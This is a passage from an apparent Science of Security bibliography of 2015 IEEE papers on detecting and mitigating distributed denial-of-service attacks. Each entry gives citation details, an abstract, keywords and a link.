Keywords: computer network security; DDoS defense; capabilities-based traffic differentiation; distributed denial-of-service; incremental improvements; scheduling-based rate-limiting; single-point solutions; Aggregates; Bandwidth; Computer crime; Filtering; Floods; IP networks; Limiting; Attack detection; Distributed Denial-of-Service; Distributed defense; Network security; Rate-limiting; Traffic differentiation (ID#: 16-9104)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7086993&isnumber=7086957

 

Bazm, M.; Khatoun, R.; Begriche, Y.; Khoukhi, L.; Xiuzhen Chen; Serhrouchni, A., “Malicious Virtual Machines Detection Through a Clustering Approach,” in Cloud Technologies and Applications (CloudTech), 2015 International Conference on, vol., no., pp. 1–8, 2–4 June 2015. doi:10.1109/CloudTech.2015.7336986
Abstract: Cloud computing aims to provide enormous resources and services, parallel processing and reliable access for users on the networks. The flexible resources of clouds could be used by malicious actors to attack other infrastructures. Cloud can be used as a platform to perform these attacks, a virtual machine (VM) in the Cloud can play the role of a malicious VM belonging to a Botnet and sends a heavy traffic to the victim. For cloud service providers, preventing their infrastructure from being turned into an attack platform is very challenging since it requires detecting attacks at the source, in a highly dynamic and heterogeneous environment. In this paper, an approach to detect these malicious behaviors in the Cloud based on the analysis of network parameters is proposed. This approach is a source-based attack detection, which applies both Entropy and clustering methods on network parameters. The environment of Cloud is simulated on Cloudsim. The data clustering allows achieving high performance, with a high percentage of correctly clustered VMs.
Keywords: cloud computing; entropy; invasive software; pattern clustering; virtual machines; Botnet; Cloudsim; attack platform; cloud resources; cloud service providers; cloud services; clustering method; data clustering; highly dynamic heterogeneous environment; malicious actors; malicious behavior detection; malicious virtual machine detection; network parameter analysis; parallel processing; source-based attack detection; Cloud computing; Computer crime; Entropy; Monitoring; Principal component analysis; Scalability; Servers; DDoS; clustering; detection  (ID#: 16-9105)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336986&isnumber=7336956

 

Pramana, M.I.W.; Purwanto, Y.; Suratman, F.Y., “DDoS Detection using Modified K-Means Clustering with Chain Initialization over Landmark Window,” in Control, Electronics, Renewable Energy and Communications (ICCEREC), 2015 International Conference on, vol., no., pp. 7–11, 27–29 Aug. 2015. doi:10.1109/ICCEREC.2015.7337056
Abstract: Denial-of-service is a common form of network attack that affect user access right by preventing legitimate user from accessing certain information, thus giving great, disadvantage to the user and service provider. This paper present a method of denial-of-service detection using clustering technique with k-means algorithm which available to be modified and developed in many possible way. K-means algorithm used in this paper is modified using chain initialization over landmark window approach to process large amount of data and the result evaluated with detection rate, accuracy, and false positive rate. This method has been proven effective in detecting denial-of-service traffic using DARPA 98 dataset with satisfying result.
Keywords: authorisation; computer network security; pattern clustering; DARPA 98 dataset; DDoS detection; chain initialization over landmark window approach; denial-of-service network attack; modified K-means clustering; user access right; Algorithm design and analysis; Clustering algorithms; Computer crime; Convergence; Data mining; IP networks; Signal processing algorithms; Chain Initialization; Clustering; DDoS; Landmark Window; Modified K-Means (ID#: 16-9106)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7337056&isnumber=7337022

 

Maiti, Sumana; Garai, Chandan; Dasgupta, Ranjan, “A Detection Mechanism of DoS Attack Using Adaptive NSA Algorithm in Cloud Environment,” in Computing, Communication and Security (ICCCS), 2015 International Conference on, vol., no., pp. 1–7,
4–5 Dec. 2015. doi:10.1109/CCCS.2015.7374128
Abstract: Security of any distributed system is not only complex in nature, it also needs much more attention as most of the applications being used and developed in recent past are on distributed platform. Denial of Service (DoS) attack causes drop in quality of service and may also reach to entire absence of service for some “real” users. Identifying some users as attackers also need appropriate algorithm. Negative selection algorithm (NSA) is a very effective approach in identifying some user as attacker. However declaring some “real” user as an attacker is a very common limitation of these types of algorithms unless and until the mechanism of detection is updated at regular intervals. In this research work we have modified NSA algorithm to take into account the necessity of updating the detector set from time to time. We have introduced a second detection module to accommodate the updation. Both the algorithms are implemented on common data set and comparative study is presented. Our proposed algorithm comes out with much improved results and significantly reduces false positive (false alarm) cases.
Keywords: Computer crime; Computers; Feature extraction; Floods; IP networks; Ports (Computers); Traffic control; DDoS; Feature Vector; IP Spoofing; NSA (ID#: 16-9107)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7374128&isnumber=7374113

 

Hurtik, P.; Hodakova, P.; Perfilieva, I.; Liberts, M.; Asmuss, J., “Network Attack Detection and Classification by the F-Transform,” in Fuzzy Systems (FUZZ-IEEE), 2015 IEEE International Conference on, vol., no., pp. 1–6, 2–5 Aug. 2015. doi:10.1109/FUZZ-IEEE.2015.7337991
Abstract: We solve the problem of network attack detection and classification. We discuss the way of generation and simulation of an artificial network traffic data. We propose an efficient algorithm for data classification that is based on the F-transform technique. The algorithm successfully passed all tests and moreover, it showed ability to perform classification in an on-line regime.
Keywords: computer network security; pattern classification; telecommunication traffic; transforms; DDoS detection; F-transform technique; artificial network traffic data generation; artificial network traffic data simulation; data classification; distributed denial-of-service attack; network attack classification; network attack detection; Computer crime; Databases; Mathematical model; Monitoring; Polynomials; Time series analysis; Transforms (ID#: 16-9108)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7337991&isnumber=7337796

 

Ghafir, I.; Prenosil, V., “Blacklist-Based Malicious IP Traffic Detection,” in Communication Technologies (GCCT), 2015 Global Conference on, vol., no., pp. 229–233, 23–24 April 2015. doi:10.1109/GCCT.2015.7342657
Abstract: At present malicious software or malware has increased considerably to form a serious threat to Internet infrastructure. It becomes the major source of most malicious activities on the Internet such as direct attacks, (distributed) denial-of-service (DOS) activities and scanning. Infected machines may join a botnet and can be used as remote attack tools to perform malicious activities controlled by the botmaster. In this paper we present our methodology for detecting any connection to or from malicious IP address which is expected to be command and control (C&C) server. Our detection method is based on a blacklist of malicious IPs. This blacklist is formed based on different intelligence feeds at once. We process the network traffic and match the source and destination IP addresses of each connection with IP blacklist. The intelligence feeds are automatically updated each day and the detection is in the real time.
Keywords: IP networks; Internet; computer network security; invasive software; C&C server; DDOS; Internet infrastructure; blacklist-based malicious IP traffic detection; command and control server; distributed denial-of-service; malicious software; malware; Electronic mail; Feeds; IP networks; Malware; Monitoring; Servers; Cyber attacks; botnet; intrusion detection system; malicious IP (ID#: 16-9109)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7342657&isnumber=7342608
 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Distributed Denial of Service Attack Mitigation 2015

 

 
SoS Logo

Distributed Denial of Service Attack Mitigation 2015

 

Distributed Denial of Service Attacks continue to be among the most prolific forms of attack against information systems.  According to the NSFOCUS DDOS Report for 2014 (available at: http://en.nsfocus.com/2014/SecurityReport_0320/165.html), DDOS attacks occur at the rate of 28 per hour.  Research into methods of response and mitigation is also substantial, as the articles presented here show.  This work was presented in 2015.


Akbar, Abdullah; Basha, S.Mahaboob; Sattar, Syed Abdul, "Leveraging the SIP Load Balancer to Detect and Mitigate DDoS Attacks," in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, pp. 1204-1208, 8-10 Oct. 2015. doi: 10.1109/ICGCIoT.2015.7380646

Abstract: SIP-based Voice Over IP(VoIP) network is becoming predominant in current and future communications. Distributed Denial of service attacks pose a serious threat to VOIP network security. SIP servers are victims of DDos attacks. The major aim of the DDos attacks is to avoid legitimate users to access resources of SIP servers. Distributed Denial of service attacks target the VOIP network by deploying bots at different locations by injecting malformed packets and even they halt the entire VOIP service causes degradation of QoS(Quality of Service). DDos attacks are easy to launch and quickly drain computational resources of VOIP network and nodes. Detecting DDos attacks is a challenging and extremely difficult due to its varying strategy and scope of attackers. Many DDos detection and prevention schemes are deployed in VOIP networks but they are not complete working in both realtime and offline modes. They are inefficient in detecting dynamic and low-rate DDos attacks and even fail when the attack is launched by simultaneously manipulating multiple SIP attributes. In this paper we propose a novel scheme based on Hellinger distance(HD) to detect low-rate and multi-attribute DDos attacks. Usually DDos detection and mitigations schemes are implemented in SIP proxy. But we leverage the SIP load balancer to fight against DDos by using existing load balancing features. We have implemented the proposed scheme by modifying leading open source kamailio SIP proxy server. We have evaluated our scheme by experimental test setup and found results are outperforming the existing DDos prevention schemes in terms of detection rate, system overhead and false-positive alarms.

Keywords: Computer crime; Feature extraction; Floods; Internet telephony; Multimedia communication; Protocols; Servers; Overload Control; Session Initiation Protocol (SIP); kamailio; server (ID#: 16-9064)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380646&isnumber=7380415

 

Santanna, J.J.; van Rijswijk-Deij, R.; Hofstede, R.; Sperotto, A.; Wierbosch, M.; Zambenedetti Granville, L.; Pras, A., "Booters — An Analysis of DDoS-as-a-Service Attacks," in Integrated Network Management (IM), 2015 IFIP/IEEE International Symposium on, pp. 243-251, 11-15 May 2015. doi: 10.1109/INM.2015.7140298

Abstract: In 2012, the Dutch National Research and Education Network, SURFnet, observed a multitude of Distributed Denial of Service (DDoS) attacks against educational institutions. These attacks were effective enough to cause the online exams of hundreds of students to be cancelled. Surprisingly, these attacks were purchased by students from Web sites, known as Booters. These sites provide DDoS attacks as a paid service (DDoS-as-a-Service) at costs starting from 1 USD. Since this problem was first identified by SURFnet, Booters have been used repeatedly to perform attacks on schools in SURFnet's constituency. Very little is known, however, about the characteristics of Booters, and particularly how their attacks are structure. This is vital information needed to mitigate these attacks. In this paper we analyse the characteristics of 14 distinct Booters based on more than 250 GB of network data from real attacks. Our findings show that Booters pose a real threat that should not be underestimated, especially since our analysis suggests that they can easily increase their firepower based on their current infrastructure.

Keywords: Web sites; computer network security; educational administrative data processing; educational institutions; Booters Web site; DDoS-as-a-service attack analysis; Dutch National Research and Education Network; SURFnet; attack mitigation; distributed denial-of-service attacks; educational institutions; firepower; network data; online exams; paid service; Algorithm design and analysis; Computer crime; Crawlers; IP networks; Internet; Protocols; Servers (ID#: 16-9065)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7140298&isnumber=7140257

 

Ndibwile, J.D.; Govardhan, A.; Okada, K.; Kadobayashi, Y., "Web Server Protection against Application Layer DDoS Attacks Using Machine Learning and Traffic Authentication," in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol. 3, pp. 261-267, 1-5 July 2015. doi: 10.1109/COMPSAC.2015.240

Abstract: Application layer Distributed Denial of Service (DDoS) attacks are among the deadliest kinds of attacks that have significant impact on destination servers and networks due to their ability to be launched with minimal computational resources to cause an effect of high magnitude. Commercial and government Web servers have become the primary target of these kinds of attacks, with the recent mitigation efforts struggling to deaden the problem efficiently. Most application layer DDoS attacks can successfully mimic legitimate traffic without being detected by Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS). IDSs and IPSs can also mistake a normal and legitimate activity for a malicious one, producing a False Positive (FP) that affects Web users if it is ignored or dropped. False positives in a large and complex network topology can potentially be dangerous as they may cause IDS/IPS to block the user's benign traffic. Our focus and contributions in this paper are first, to mitigate the undetected malicious traffic mimicking legitimate traffic and developing a special anti-DDoS module for general and specific DDoS tools attacks by using a trained classifier in a random tree machine-learning algorithm. We use labeled datasets to generate rules to incorporate and fine-tune existing IDS/IPS such as Snort. Secondly, we further assist IDS/IPS by processing traffic that is classified as malicious by the IDS/IPS in order to identify FPs and route them to their intended destinations. To achieve this, our approach uses active authentication of traffic source of both legitimate and malicious traffic at the Bait and Decoy server respectively before destined to the Web server.

Keywords: Internet; computer network security; file servers; learning (artificial intelligence);pattern classification; telecommunication traffic; FP; IDS; IPS; Web server protection; Web users; application layer DDoS attacks; bait-and-decoy server; destination servers; distributed denial of service; false positive; government Web servers ;intrusion detection systems; intrusion prevention systems; legitimate traffic; malicious traffic; minimal computational resources; mitigation efforts; random tree machine-learning algorithm; traffic authentication; traffic source active authentication; trained classifier; Authentication; Computer crime; Logic gates; Training; Web servers; DDoS Mitigation; False Positives; IDS/IPS; Java Script; Machine Learning (ID#: 16-9066)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273365&isnumber=7273299

 

Zeb, K.; Baig, O.; Asif, M.K., "DDoS Attacks and Countermeasures in Cyberspace," in Web Applications and Networking (WSWAN), 2015 2nd World Symposium on, pp. 1-6, 21-23 March 2015. doi: 10.1109/WSWAN.2015.7210322

Abstract: In cyberspace, availability of the resources is the key component of cyber security along with confidentiality and integrity. Distributed Denial of Service (DDoS) attack has become one of the major threats to the availability of resources in computer networks. It is a challenging problem in the Internet. In this paper, we present a detailed study of DDoS attacks on the Internet specifically the attacks due to protocols vulnerabilities in the TCP/IP model, their countermeasures and various DDoS attack mechanisms. We thoroughly review DDoS attacks defense and analyze the strengths and weaknesses of different proposed mechanisms.

Keywords: Internet; computer network security; transport protocols; DDoS attack mechanisms; Internet; TCP-IP model; computer networks; cyber security; cyberspace; distributed denial of service attacks; Computer crime; Filtering; Floods; IP networks; Internet; Protocols; Servers; Cyber security; Cyber-attack; Cyberspace; DDoS Defense; DDoS attack; Mitigation; Vulnerability (ID#: 16-9067)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7210322&isnumber=7209078

 

Al-Ali, Zaid; Al-Duwairi, Basheer; Al-Hammouri, Ahmad T., "Handling System Overload Resulting from DDoS Attacks and Flash Crowd Events," in Cyber Security and Cloud Computing (CSCloud), 2015 IEEE 2nd International Conference on, pp. 512-512, 3-5 Nov. 2015. doi: 10.1109/CSCloud.2015.66

Abstract: This paper presents a system that provides mitigation for DDoS attacks as a service, and is capable of handling flash crowd events at the same time. Providing DDoS protection as a service represents an important solution especially for Websites that have limited resources with no infrastructure in place for defense against these attacks. The proposed system is composed of two main components: (i) The distributed CAPTCHA service, which comprises a large number of powerful nodes geographically and suitably distributed in the Internet acting as a large distributed firewall, and (ii) The HTTP redirect module, which is a stateless HTTP server that redirects Web requests destined to the targeted Webserver to one of the CAPTCHA nodes. The CAPTCHA node can then segregate legitimate clients from automated attacks by requiring them to solve a challenge. Upon successful response, legitimate clients (humans) are forwarded through a given CAPTCHA node to the Webserver.

Keywords: Ash; CAPTCHAs; Computer crime; Conferences; Relays; Servers (ID#: 16-9068)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371531&isnumber=7371418

 

Singh, K.J.; De, T., "DDOS Attack Detection and Mitigation Technique Based on Http Count and Verification Using CAPTCHA," in Computational Intelligence and Networks (CINE), 2015 International Conference on, pp. 196-197, 12-13 Jan. 2015. doi: 10.1109/CINE.2015.47

Abstract: With the rapid development of internet, the number of people who are online also increases tremendously. But now a day's we find not only growing positive use of internet but also the negative use of it. The misuse and abuse of internet is growing at an alarming rate. There are large cases of virus and worms infecting our systems having the software vulnerability. These systems can even become the clients for the bot herders. These infected system aid in launching the DDoS attack to a target server. In this paper we introduced the concept of IP blacklisting which will blocked the entire blacklisted IP address, http count filter will enable us to detect the normal and the suspected IP addresses and the CAPTCHA technique to counter check whether these suspected IP address are in control by human or botnet.

Keywords: Internet; client-server systems; computer network security; computer viruses; transport protocols; CAPTCHA; DDOS attack detection; DDOS attack mitigation technique; HTTP count filter; HTTP verification; IP address; IP blacklisting; Internet; botnet; software vulnerability; target server; virus; worms; CAPTCHAs; Computer crime; IP networks; Internet; Radiation detectors; Servers; bot; botnets; captcha; filter; http; mitigation (ID#: 16-9069)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7053830&isnumber=7053782

 

Gde Dharma, N.I.; Muthohar, M.F.; Prayuda, J.D.A.; Priagung, K.; Deokjai Choi, "Time-based DDoS Detection and Mitigation for SDN Controller," in Network Operations and Management Symposium (APNOMS), 2015 17th Asia-Pacific, pp. 550-553, 19-21 Aug. 2015. doi: 10.1109/APNOMS.2015.7275389

Abstract: A Software Defined Network (SDN) is a new paradigm in network management that separates control plane and data plane. A control plane has an important role in managing the whole networks. Since SDN introduces control plane as the manager of the network, it also introduces the single point of failure. When SDN controller is unreachable by the network devices, the whole networks will collapse. One of the attack methods that can make SDN controller unreachable is DDoS attack. This paper reports our initial step of our research to develop the method for DDoS attack detection and mitigation for SDN controller. The method considers the time duration of DDoS attack detection and attacks time pattern of DDoS attack to prevent the future attack. In this paper, we present the potential vulnerabilities in SDN controller that can be exploited for DDoS attack and discuss the methods to detect and mitigate DDoS attack.

Keywords: computer network management; computer network reliability; computer network security; control engineering computing; software defined networking; SDN controller failure; control plane; data plane; software defined network management; time-based DDoS attack detection; time-based DDoS attack mitigation; Computer crime; Floods; Monitoring; Software defined networking; Switches; DDoS attack; Network; Network Management; Network Security; SDN (ID#: 16-9070)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275389&isnumber=7275336

 

Jaehoon Jeong; Jihyeok Seo; Geumhwan Cho; Hyoungshick Kim; Jung-Soo Park, "A Framework for Security Services Based on Software-Defined Networking," in Advanced Information Networking and Applications Workshops (WAINA), 2015 IEEE 29th International Conference on, pp. 150-153, 24-27 March 2015. doi: 10.1109/WAINA.2015.102

Abstract: This paper proposes a framework for security services using Software-Defined Networking (SDN) and specifies requirements for such a framework. It describes two representative security services, such as (i) centralized firewall system and (ii) centralized DDoS-attack mitigation system. For each service, this paper discusses the limitations of legacy systems and presents a possible SDN-based system to protect network resources by controlling suspicious and dangerous network traffic that can be regarded as security attacks.

Keywords: computer network security; firewalls; software defined networking; software maintenance; SDN; centralized DDoS-attack mitigation system; centralized firewall system; legacy system; network resource protection; network traffic; security attack; security service; software-defined networking; Access control; Computer crime; Control systems; Firewalls (computing); Malware; Servers; DDoS-Attack Mitigator; Firewall; Framework; Security Services; Software-Defined Networking (ID#: 16-9071)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7096163&isnumber=7096097

 

Ugwoke, F.N.; Okafor, K.C.; Chijindu, V.C., "Security QoS Profiling Against Cyber Terrorism in Airport Network Systems," in Cyberspace (CYBER-Abuja), 2015 International Conference on pp. 241-251, 4-7 Nov. 2015. doi: 10.1109/CYBER-Abuja.2015.7360516

Abstract: Attacks on airport information network services in the form of Denial of Service (DoS), Distributed DoS (DDoS), and hijacking are the most effective schemes mostly explored by cyber terrorists in the aviation industry running Mission Critical Services (MCSs). This work presents a case for Airport Information Resource Management Systems (AIRMS) which is a cloud based platform proposed for the Nigerian aviation industry. Granting that AIRMS is susceptible to DoS attacks, there is need to develop a robust counter security network model aimed at pre-empting such attacks and subsequently mitigating the vulnerability in such networks. Existing works in literature regarding cyber security DoS and other schemes have not explored embedded Stateful Packet Inspection (SPI) based on OpenFlow Application Centric Infrastructure (OACI) for securing critical network assets. As such, SPI-OACI was proposed to address the challenge of Vulnerability Bandwidth Depletion DDoS Attacks (VBDDA). A characterization of the Cisco 9000 router firewall as an embedded network device with support for Virtual DDoS protection was carried out in the AIRMS threat mitigation design. Afterwards, the mitigation procedure and the initial phase of the design with Riverbed modeler software were realized. For the security Quality of Service (QoS) profiling, the system response metrics (i.e. SPI-OACI delay, throughput and utilization) in cloud based network were analyzed only for normal traffic flows. The work concludes by offering practical suggestion for securing similar enterprise management systems running on cloud infrastructure against cyber terrorists.

Keywords: airports; cloud computing; embedded systems; firewalls; information management; quality of service; telecommunication network routing; AIRMS; Cisco 9000 router firewall; MCS; Nigerian aviation industry; OpenFlow application centric infrastructure; SPI-OACI; VBDDA; airport information network services; airport information resource management systems; airport network systems; aviation industry; cloud based network; cloud based platform; cloud infrastructure; critical network assets; cyber terrorism; cyber terrorists; denial of service; distributed DoS; embedded network device; mission critical services; quality of service profiling; riverbed modeler software; robust counter security network model; security QoS profiling; stateful packet inspection; system response metrics; virtual DDoS protection; vulnerability bandwidth depletion DDoS attacks; Air traffic control; Airports; Atmospheric modeling; Computer crime; Floods; AIRMS; Attacks; Aviation Industry; Cloud Datacenters; DDoS; DoS; Mitigation Techniques; Vulnerabilities (ID#: 16-9072)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7360516&isnumber=7360499

 

Gillani, F.; Al-Shaer, E.; Lo, S.; Qi Duan; Ammar, M.; Zegura, E., "Agile Virtualized Infrastructure to Proactively Defend Against Cyber Attacks," in Computer Communications (INFOCOM), 2015 IEEE Conference on, pp. 729-737, April 26 2015-May 1 2015. doi: 10.1109/INFOCOM.2015.7218442

Abstract: DDoS attacks have been a persistent threat to network availability for many years. Most of the existing mitigation techniques attempt to protect against DDoS by filtering out attack traffic. However, as critical network resources are usually static, adversaries are able to bypass filtering by sending stealthy low traffic from large number of bots that mimic benign traffic behavior. Sophisticated stealthy attacks on critical links can cause a devastating effect such as partitioning domains and networks. In this paper, we propose to defend against DDoS attacks by proactively changing the footprint of critical resources in an unpredictable fashion to invalidate an adversary's knowledge and plan of attack against critical network resources. Our present approach employs virtual networks (VNs) to dynamically reallocate network resources using VN placement and offers constant VN migration to new resources. Our approach has two components: (1) a correct-by-construction VN migration planning that significantly increases the uncertainty about critical links of multiple VNs while preserving the VN placement properties, and (2) an efficient VN migration mechanism that identifies the appropriate configuration sequence to enable node migration while maintaining the network integrity (e.g., avoiding session disconnection). We formulate and implement this framework using SMT logic. We also demonstrate the effectiveness of our implemented framework on both PlanetLab and Mininet-based experimentations.

Keywords: computer network security; formal logic; virtualisation; DDoS attacks; Mininet; PlanetLab; SMT logic; VN migration; VN placement; agile virtualized infrastructure; attack mitigation techniques; critical network resources;cyber attacks; distributed denial-of-service attack; network availability; network resource reallocation; virtual networks; Computational modeling; Computer crime; Mathematical model; Reconnaissance; Routing protocols; Servers; Substrates (ID#: 16-9073)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7218442&isnumber=7218353

 

Kalliola, A.; Kiryong Lee; Heejo Lee; Aura, T., "Flooding DDoS Mitigation and Traffic Management with Software Defined Networking," in Cloud Networking (CloudNet), 2015 IEEE 4th International Conference on, pp. 248-254, 5-7 Oct. 2015. doi: 10.1109/CloudNet.2015.7335317

Abstract: Mitigating distributed denial-of-service attacks can be a complex task due to the wide range of attack types, attacker adaptation, and defender constraints. We propose a defense mechanism which is largely automated and can be implemented on current software defined networking (SDN)-enabled networks. Our mechanism combines normal traffic learning, external blacklist information, and elastic capacity invocation in order to provide effective load control, filtering and service elasticity during an attack. We implement the mechanism and analyze its performance on a physical SDN testbed using a comprehensive set of real-life normal traffic traces and synthetic attack traces. The results indicate that the mechanism is effective in maintaining roughly 50% to 80% service levels even when hit by an overwhelming attack.

Keywords: computer network security; software defined networking; telecommunication traffic; SDN-enabled networks; attack types; attacker adaptation; defender constraints; defense mechanism; distributed denial-of-service attack mitigation; elastic capacity invocation; external blacklist information; filtering; flooding DDoS mitigation; load control; normal traffic learning; overwhelming attack; performance analysis; physical SDN testbed; real-life normal traffic traces; service elasticity; service levels; software defined networking; synthetic attack traces; traffic management; Cloud computing; Clustering algorithms; Computer crime; Control systems; IP networks; Servers (ID#: 16-9074)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335317&isnumber=7335267

 

Hirayama, Takayuki; Toyoda, Kentaroh; Sasase, Iwao, "Fast Target Link Flooding Attack Detection Scheme by Analyzing Traceroute Packets Flow," in Information Forensics and Security (WIFS), 2015 IEEE International Workshop on, pp. 1-6, 16-19 Nov. 2015. doi: 10.1109/WIFS.2015.7368594

Abstract: Recently, a botnet based DDoS (Distributed Denial of Service) attack, called target link flooding attack, has been reported that cuts off specific links over the Internet and disconnects a specific region from other regions. Detecting or mitigating the target link flooding attack is more difficult than legacy DDoS attack techniques, since attacking flows do not reach the target region. Although many mitigation schemes are proposed, they detect the attack after it occurs. In this paper, we propose a fast target link flooding attack detection scheme by leveraging the fact that the traceroute packets are increased before the attack caused by the attacker's reconnaissance. Moreover, by analyzing the characteristic of the target link flooding attack that the number of traceroute packets simultaneously increases in various regions over the network, we propose a detection scheme with multiple detection servers to eliminate false alarms caused by sudden increase of traceroute packets sent by legitimate users. We show the effectiveness of our scheme by computer simulations.

Keywords: Computational modeling; Reconnaissance (ID#: 16-9075)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7368594&isnumber=7368550

 

Jog, M.; Natu, M.; Shelke, S., "Distributed Capabilities-based DDoS Defense," in Pervasive Computing (ICPC), 2015 International Conference on, pp. 1-6, 8-10 Jan. 2015. doi: 10.1109/PERVASIVE.2015.7086993

Abstract: Existing strategies against DDoS are implemented as single-point solutions at different network locations. Our understanding is that, no single network location can cater to the needs of a full-proof defense solution, given the nature of DDoS and activities for its mitigation. This paper gives collective information about some important defense mechanisms discussing their advantages and limitations. Based on our understanding, we propose distribution of DDoS defense which uses improved techniques for capabilities-based traffic differentiation and scheduling-based rate-limiting. Additionally, we propose a novel approach for prediction of attack to determine the prospective attackers as well as the time-to-saturation of victim. We present two algorithms for this distribution of defense. The proposed distributed approach built with these incremental improvements in the defense activities is expected to provide better solution against the DDoS problem.

Keywords: computer network security; DDoS defense; capabilities-based traffic differentiation; distributed denial-of-service; incremental improvements; scheduling-based rate-limiting; single-point solutions; Aggregates; Bandwidth; Computer crime; Filtering; Floods; IP networks; Limiting; Attack detection; Distributed Denial-of-Service; Distributed defense; Network security; Rate-limiting; Traffic differentiation (ID#: 16-9076)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7086993&isnumber=7086957

 

Guenane, F.; Nogueira, M.; Serhrouchni, A., "DDOS Mitigation Cloud-Based Service," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 1363-1368, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.531

Abstract: Cloud computing has evolved over the last decade from a simple storage service for more complex ones, offering software as a service (SaaS), platforms as a service (PaaS) and most recently security as a service (SECaaS). The work presented in this paper is a response to: (1) the resource constraints in physical security devices such as firewalls or IPS/IDS, that can no more counter advanced DDOS attacks, (2) The expensive cost, management complexity and the requirement of high amount of resources on existing DDOS mitigation tools to verify the traffic. We propose a new architecture of a cloud based firewalling service using resources offered by the Cloud and characterized by: a low financial cost, high availability, reliability, self scaling and easy managing. In order to improve the efficiency of our proposal to face DDOS attacks, we deploy, configure and test our mitigation service using Network Function Virtualization technology (NFV) and other virtualization capabilities. We also detail some result and point out future work.

Keywords: cloud computing; firewalls; reliability; virtualisation; DDOS mitigation tools; NFV; availability; cloud based firewalling service; cloud computing; cloud-based service; distributed denial of service; financial cost; management complexity; network function virtualization technology; physical security devices resource constraints; reliability; self scaling; traffic verification; Authentication; Cloud computing; Computer architecture; Computer crime; Firewalls (computing);Logic gates; Cloud based service; DDOS; Distributed Denial of Service; Firewalling; SECAAS; Security As A Service (ID#: 16-9077)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345439&isnumber=7345233

 

Alosaimi, Wael; Zak, Michal; Al-Begain, Khalid, "Denial of Service Attacks Mitigation in the Cloud," in Next Generation Mobile Applications, Services and Technologies, 2015 9th International Conference on, pp. 47-53, 9-11 Sept. 2015. doi: 10.1109/NGMAST.2015.48

Abstract: Denial of Service attack (DoS) forms a permanent risk to the traditional networks and the cloud environment. This malicious attack can be amplified by Distributed Denial of Service (DDoS) attacks. Moreover, the cloud payment model can be affected by such attacks exploiting the cloud scalability. In this case, it is called Economical Denial of Sustainability (EDoS) attack. This study introduces an effective solution that is designed to counteract such attacks and protect targeted networks. The proposed framework is called Enhanced DDoS-Mitigation System (Enhanced DDoS-MS). This method is tested practically and the test's results proved the success of the framework in limiting the end-to-end response time and handling complex versions of these attacks on multiple layers.

Keywords: CAPTCHAs; Cloud computing Computer crime; Firewalls (computing); IP networks; Limiting; Servers; Cloud Computing; DDoS; Denial of Service; Distributed Denial of Service attacks; DoS; EDoS; Economical Denial of Sustainability (ID#: 16-9078)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373217&isnumber=7373199

 

Fung, C.J.; McCormick, B., "VGuard: A Distributed Denial of Service Attack Mitigation Method Using Network Function Virtualization," in Network and Service Management (CNSM), 2015 11th International Conference on, pp. 64-70, 9-13 Nov. 2015. doi: 10.1109/CNSM.2015.7367340

Abstract: Distributed denial of service (DDoS) attacks have caused tremendous damage to ISPs and online services. They can be divided into attacks using spoofed IPs and attacks using real IPs (botnet). Among them the attacks from real IPs are much harder to mitigate since the attack traffic can be fabricated to be similar to legitimate traffic. The corresponding DDoS defence strategies proposed in past few years have not been proven to be highly effective due to the limitation of participating devices. However, the emergence of the next generation networking technologies such a network function virtualization (NFV) provide a new opportunity for researchers to design DDoS mitigation solutions. In this paper we propose VGuard, a dynamic traffic engineering solution based on prioritization, which is implemented on a DDoS virtual network function (VNF). The flows from the external zone are directed to different tunnels based on their priority levels. This way trusted legitimate flows are served with guaranteed quality of service, while attack flows and suspicious flows compete for resources with each other. We propose two methods for flow direction: the static method and the dynamic method. We evaluated the performance of both methods through simulation. Our results show that both methods can effectively provide satisfying service to trusted flows under DDoS attacks, and both methods have their pros and cons under different situations.

Keywords: computer network security; telecommunication traffic; virtualisation; DDoS virtual network function; IP spoofing; VGuard; distributed denial of service attack mitigation; dynamic method; flow direction method; network function virtualization; prioritization based dynamic traffic engineering; real IP botnet; static method; Computer crime; Dispatching; Hardware; IP networks; Quality of service; Servers (ID#: 16-9079)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7367340&isnumber=7367318

 

Alosaimi, Wael; Alshamrani, Mazin; Al-Begain, Khalid, "Simulation-Based Study of Distributed Denial of Service Attacks Prevention in the Cloud," in Next Generation Mobile Applications, Services and Technologies, 2015 9th International Conference on, pp. 60-65, 9-11 Sept. 2015. doi: 10.1109/NGMAST.2015.50

